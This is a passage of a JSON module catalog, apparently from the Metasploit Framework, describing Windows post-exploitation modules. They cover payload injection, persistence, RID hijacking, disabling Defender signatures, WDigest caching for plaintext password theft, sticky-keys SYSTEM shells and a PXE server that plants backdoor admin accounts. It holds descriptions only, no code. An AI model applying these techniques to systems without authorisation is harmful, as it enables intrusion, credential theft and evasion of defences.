"full_name": "post/windows/manage/mssql_local_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Scott Sutherland <scott.sutherland@netspi.com>"
],
"description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2000 through 2008, LocalSystem\n is assigned sysadmin privileges. Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating into the SQL Server service\n process, which still holds those rights.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
"is_install_path": true,
"ref_name": "windows/manage/mssql_local_auth_bypass",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/multi_meterpreter_inject": {
"name": "Windows Manage Inject in Memory Multiple Payloads",
"full_name": "post/windows/manage/multi_meterpreter_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module will inject a given payload into several processes, with each\n injected payload connecting back to one of a given list of IP addresses.\n The module works from a list of IP addresses and a list of process PIDs;\n if no PID is given, it will start the process named in the advanced\n options and inject the selected payload into the memory of that\n newly created process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/multi_meterpreter_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/multi_meterpreter_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/nbd_server": {
"name": "Windows Manage Local NBD Server for Remote Disks",
"full_name": "post/windows/manage/nbd_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Wesley McGrew <wesley@mcgrewsecurity.com>"
],
"description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/nbd_server.rb",
"is_install_path": true,
"ref_name": "windows/manage/nbd_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/payload_inject": {
"name": "Windows Manage Memory Payload Injection Module",
"full_name": "post/windows/manage/payload_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>"
],
"description": "This module will inject into the memory of a process a specified windows payload.\n If a payload or process is not provided one will be created by default\n using a reverse x86 TCP Meterpreter Payload.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/payload_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/payload_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/peinjector": {
"name": "Peinjector",
"full_name": "post/windows/manage/peinjector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maximiliano Tedesco <maxitedesco1@gmail.com>"
],
"description": "This module will inject a specified windows payload into a target executable.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-08-28 11:33:17 +0000",
"path": "/modules/post/windows/manage/peinjector.rb",
"is_install_path": true,
"ref_name": "windows/manage/peinjector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/persistence_exe": {
"name": "Windows Manage Persistent EXE Payload Installer",
"full_name": "post/windows/manage/persistence_exe",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Merlyn drforbin Cousins <drforbin6@gmail.com>"
],
"description": "This module will upload an executable to a remote host and make it persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login;\n SYSTEM will start on system boot but requires elevated privileges; SERVICE will\n create a new service which will start the payload, and also requires elevated\n privileges.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-26 17:46:18 +0000",
"path": "/modules/post/windows/manage/persistence_exe.rb",
"is_install_path": true,
"ref_name": "windows/manage/persistence_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/portproxy": {
"name": "Windows Manage Set Port Forwarding With PortProxy",
"full_name": "post/windows/manage/portproxy",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module uses the PortProxy interface from netsh to set up\n port forwarding persistently (even after reboot). PortProxy\n supports TCP IPv4 and IPv6 connections.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/portproxy.rb",
"is_install_path": true,
"ref_name": "windows/manage/portproxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/build_net_code": {
"name": "Powershell .NET Compiler",
"full_name": "post/windows/manage/powershell/build_net_code",
"rank": 600,
"disclosure_date": "2012-08-14",
"type": "post",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module will build a .NET source file using PowerShell. The compiler builds\n the executable or library in memory and produces a binary. After compilation the\n PowerShell session can also sign the executable if provided a path to\n a .pfx formatted certificate. Compiler options and a list of required\n assemblies can be configured in the datastore.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-27 07:41:06 +0000",
"path": "/modules/post/windows/manage/powershell/build_net_code.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/build_net_code",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/exec_powershell": {
"name": "Windows Manage PowerShell Download and/or Execute",
"full_name": "post/windows/manage/powershell/exec_powershell",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nicholas Nam (nick) <nick@executionflow.org>",
"RageLtMan"
],
"description": "This module will download and execute a PowerShell script over a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/exec_powershell",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/powershell/load_script": {
"name": "Load Scripts Into PowerShell Session",
"full_name": "post/windows/manage/powershell/load_script",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Turner (benpturner) <benpturner@yahoo.com>",
"Dave Hardy (davehardy20) <davehardy20@gmail.com>"
],
"description": "This module will download and execute one or more PowerShell scripts\n over an existing PowerShell session.\n Setting VERBOSE to true will show the stager results.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/powershell/load_script.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/load_script",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/pptp_tunnel": {
"name": "Windows Manage Remote Point-to-Point Tunneling Protocol",
"full_name": "post/windows/manage/pptp_tunnel",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n the tunnel is created it can be used to force the victim's traffic through the\n server, giving the attacker a man-in-the-middle position. Be sure to enable\n forwarding and masquerading on the VPN server (the MITM host).",
"references": [
"URL-http://www.youtube.com/watch?v=vdppEZjMPCM&hd=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/pptp_tunnel.rb",
"is_install_path": true,
"ref_name": "windows/manage/pptp_tunnel",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/priv_migrate": {
"name": "Windows Manage Privilege Based Process Migration ",
"full_name": "post/windows/manage/priv_migrate",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Josh Hale \"sn0wfa11\" <jhale85446@gmail.com>",
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will migrate a Meterpreter session based on session privileges.\n It will do everything it can to migrate, including spawning a new User level process.\n For sessions with Admin rights: It will try to migrate into a System level process in the following\n order: ANAME (if specified), services.exe, wininit.exe, svchost.exe, lsm.exe, lsass.exe, and winlogon.exe.\n If all these fail and NOFAIL is set to true, it will fall back to User level migration. For sessions with User level rights:\n It will try to migrate to a user level process, if that fails it will attempt to spawn the process\n then migrate to it. It will attempt the User level processes in the following order:\n NAME (if specified), explorer.exe, then notepad.exe.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/priv_migrate.rb",
"is_install_path": true,
"ref_name": "windows/manage/priv_migrate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/pxeexploit": {
"name": "Windows Manage PXE Exploit Server",
"full_name": "post/windows/manage/pxeexploit",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any linux\n partition seen. The windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n See exploit/windows/misc/pxesploit for a version to deliver a specific payload.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/pxeexploit.rb",
"is_install_path": true,
"ref_name": "windows/manage/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/reflective_dll_inject": {
"name": "Windows Manage Reflective DLL Injection Module",
"full_name": "post/windows/manage/reflective_dll_inject",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will inject into the memory of a process a specified Reflective DLL.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/reflective_dll_inject.rb",
"is_install_path": true,
"ref_name": "windows/manage/reflective_dll_inject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/remove_ca": {
"name": "Windows Manage Certificate Authority Removal",
"full_name": "post/windows/manage/remove_ca",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to remove an arbitrary CA certificate\n from the victim's Trusted Root store.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/remove_ca.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_ca",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/remove_host": {
"name": "Windows Manage Host File Entry Removal",
"full_name": "post/windows/manage/remove_host",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"vt <nick.freeman@security-assessment.com>"
],
"description": "This module allows the attacker to remove an entry from the Windows hosts file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/remove_host.rb",
"is_install_path": true,
"ref_name": "windows/manage/remove_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rid_hijack": {
"name": "Windows Manage RID Hijacking",
"full_name": "post/windows/manage/rid_hijack",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Sebastian Castro <sebastian.castro@cslcolombia.com>"
],
"description": "This module will create an entry on the target by modifying some properties\n of an existing account. It will change the account attributes by setting a\n Relative Identifier (RID) that belongs to another existing\n account on the destination machine.\n\n Taking advantage of some Windows Local Users Management integrity issues,\n this module allows authentication with the credentials of one known\n account (such as the GUEST account) while obtaining the privileges of another\n existing account (such as the ADMINISTRATOR account), even if the spoofed account is\n disabled.",
"references": [
"URL-http://csl.com.co/rid-hijacking/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-03 04:57:41 +0000",
"path": "/modules/post/windows/manage/rid_hijack.rb",
"is_install_path": true,
"ref_name": "windows/manage/rid_hijack",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rollback_defender_signatures": {
"name": "Disable Windows Defender Signatures",
"full_name": "post/windows/manage/rollback_defender_signatures",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"metasploit <metasploit@csiete.org>",
"luisco100 <luisco100@gmail.com>"
],
"description": "Given appropriate rights, this module uses the Windows Defender command-line\n utility (MpCmdRun.exe) to remove all signatures installed on the compromised machine.\n The tool is mainly used for scheduling scans and updating the signature or definition files,\n but it also has a switch that restores the installed signature definitions either to a\n previous backup copy or to the original default set, which contains no signatures.\n Rolling back to that default set disables all signatures and allows malware\n to execute even with Windows Defender still enabled.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-30 16:41:40 +0000",
"path": "/modules/post/windows/manage/rollback_defender_signatures.rb",
"is_install_path": true,
"ref_name": "windows/manage/rollback_defender_signatures",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/rpcapd_start": {
"name": "Windows Manage Remote Packet Capture Service Starter",
"full_name": "post/windows/manage/rpcapd_start",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module enables the Remote Packet Capture System (rpcapd service)\n included in the default installation of WinPcap. The module allows you to set up\n the service in passive or active mode (useful if the client is behind a firewall).\n If authentication is enabled you need a local user account to capture traffic.\n How the PORT option is used depends on the configured mode.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/rpcapd_start.rb",
"is_install_path": true,
"ref_name": "windows/manage/rpcapd_start",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/run_as": {
"name": "Windows Manage Run Command As User",
"full_name": "post/windows/manage/run_as",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will log in with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default; by setting\n CMDOUT to true, output will be redirected to a temp file and read back in for\n display. By setting the advanced option SETPASS to true, it will reset the user's\n password and then execute the command. Note that resetting the password is a\n destructive change to the target account and is likely to be noticed.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-04-09 15:27:50 +0000",
"path": "/modules/post/windows/manage/run_as.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/run_as_psh": {
"name": "Windows 'Run As' Using Powershell",
"full_name": "post/windows/manage/run_as_psh",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"p3nt4"
],
"description": "This module will start a process as another user using powershell.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/run_as_psh.rb",
"is_install_path": true,
"ref_name": "windows/manage/run_as_psh",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/sdel": {
"name": "Windows Manage Safe Delete",
"full_name": "post/windows/manage/sdel",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "The goal of the module is to hinder the recovery of deleted files by overwriting\n their contents. This could be useful when you need to place a file on the victim\n machine and then delete it without leaving clues about its contents. Note that the script\n does not wipe the free disk space, so temporary/sparse/encrypted/compressed files may\n not be overwritten. Note too that MFT entries are not overwritten, so very small files\n could remain resident within the stream descriptor.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/sdel.rb",
"is_install_path": true,
"ref_name": "windows/manage/sdel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/sticky_keys": {
"name": "Sticky Keys Persistance Module",
"full_name": "post/windows/manage/sticky_keys",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"OJ Reeves"
],
"description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n for certain executables.\n\n The module options allow for this hack to be applied to:\n\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n The hack can be added using the ADD action, and removed with the REMOVE action.\n\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n to the target prior to running the module. By default, a SYSTEM command prompt is installed\n using the registry method if this module is run without modifying any parameters.",
"references": [
"URL-https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit",
"URL-http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/sticky_keys.rb",
"is_install_path": true,
"ref_name": "windows/manage/sticky_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vmdk_mount": {
"name": "Windows Manage VMDK Mount Drive",
"full_name": "post/windows/manage/vmdk_mount",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage\n of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the\n device and then it sends a certain control code via DeviceIoControl to mount it. Use the write mode with\n extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots\n or clones are linked from the file.",
"references": [
"URL-http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vmdk_mount.rb",
"is_install_path": true,
"ref_name": "windows/manage/vmdk_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_create": {
"name": "Windows Manage Create Shadow Copy",
"full_name": "post/windows/manage/vss_create",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to create a new volume shadow copy.\n This is based on the VSSOwn Script originally posted by\n Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_create.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_create",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_list": {
"name": "Windows Manage List Shadow Copies",
"full_name": "post/windows/manage/vss_list",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to list any Volume Shadow Copies\n on the system. This is based on the VSSOwn Script\n originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_list.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_list",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_mount": {
"name": "Windows Manage Mount Shadow Copy",
"full_name": "post/windows/manage/vss_mount",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to mount a Volume Shadow Copy\n on the system. This is based on the VSSOwn Script\n originally posted by Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_mount.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_mount",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_set_storage": {
"name": "Windows Manage Set Shadow Copy Storage Space",
"full_name": "post/windows/manage/vss_set_storage",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to change the amount of space\n for volume shadow copy storage. This is based on the\n VSSOwn Script originally posted by Tim Tomes and\n Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/vss_set_storage.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_set_storage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/vss_storage": {
"name": "Windows Manage Get Shadow Copy Storage Info",
"full_name": "post/windows/manage/vss_storage",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module will attempt to get volume shadow copy storage info.\n This is based on the VSSOwn Script originally posted by\n Tim Tomes and Mark Baggett.\n\n Works on win2k3 and later.",
"references": [
"URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/vss_storage.rb",
"is_install_path": true,
"ref_name": "windows/manage/vss_storage",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/wdigest_caching": {
"name": "Windows Post Manage WDigest Credential Caching",
"full_name": "post/windows/manage/wdigest_caching",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kostas Lintovois <kostas.lintovois@mwrinfosecurity.com>"
],
"description": "On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables\n credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key.\n Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/manage/wdigest_caching.rb",
"is_install_path": true,
"ref_name": "windows/manage/wdigest_caching",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/manage/webcam": {
"name": "Windows Manage Webcam",
"full_name": "post/windows/manage/webcam",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will allow the user to detect installed webcams (with\n the LIST action) or take a snapshot (with the SNAPSHOT action).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/manage/webcam.rb",
"is_install_path": true,
"ref_name": "windows/manage/webcam",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/computer_browser_discovery": {
"name": "Windows Recon Computer Browser Discovery",
"full_name": "post/windows/recon/computer_browser_discovery",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module uses railgun to discover hostnames and IPs on the network.\n LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers),\n SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers),\n NOVELL (all Novell servers), PRINTSVR (all Print Queue servers), MASTERBROWSER (all Master Browsers),\n WINDOWS (all Windows hosts), or UNIX (all Unix hosts).",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/recon/computer_browser_discovery.rb",
"is_install_path": true,
"ref_name": "windows/recon/computer_browser_discovery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/outbound_ports": {
"name": "Windows Outbound-Filtering Rules",
"full_name": "post/windows/recon/outbound_ports",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "This module performs a TCP traceroute to discover outbound-filtering rules.\n It will try to make a TCP connection to a certain public IP address (this IP\n does not need to be under your control) using different incremental TTL values.\n This way, if you get an answer (ICMP TTL time exceeded packet) from a public IP\n device, you can infer that the destination port is allowed. If STOP is set to\n true, the module will stop as soon as you reach a public IP (this will generate\n less noise in the network).",
"references": [
"URL-http://www.shelliscoming.com/2014/11/getting-outbound-filtering-rules-by.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/recon/outbound_ports.rb",
"is_install_path": true,
"ref_name": "windows/recon/outbound_ports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/recon/resolve_ip": {
"name": "Windows Recon Resolve IP",
"full_name": "post/windows/recon/resolve_ip",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module reverse-resolves an IP address or range to hostnames.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/recon/resolve_ip.rb",
"is_install_path": true,
"ref_name": "windows/recon/resolve_ip",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/wlan/wlan_bss_list": {
"name": "Windows Gather Wireless BSS Info",
"full_name": "post/windows/wlan/wlan_bss_list",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module gathers information about the wireless Basic Service Sets\n available to the victim machine.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/wlan/wlan_bss_list.rb",
"is_install_path": true,
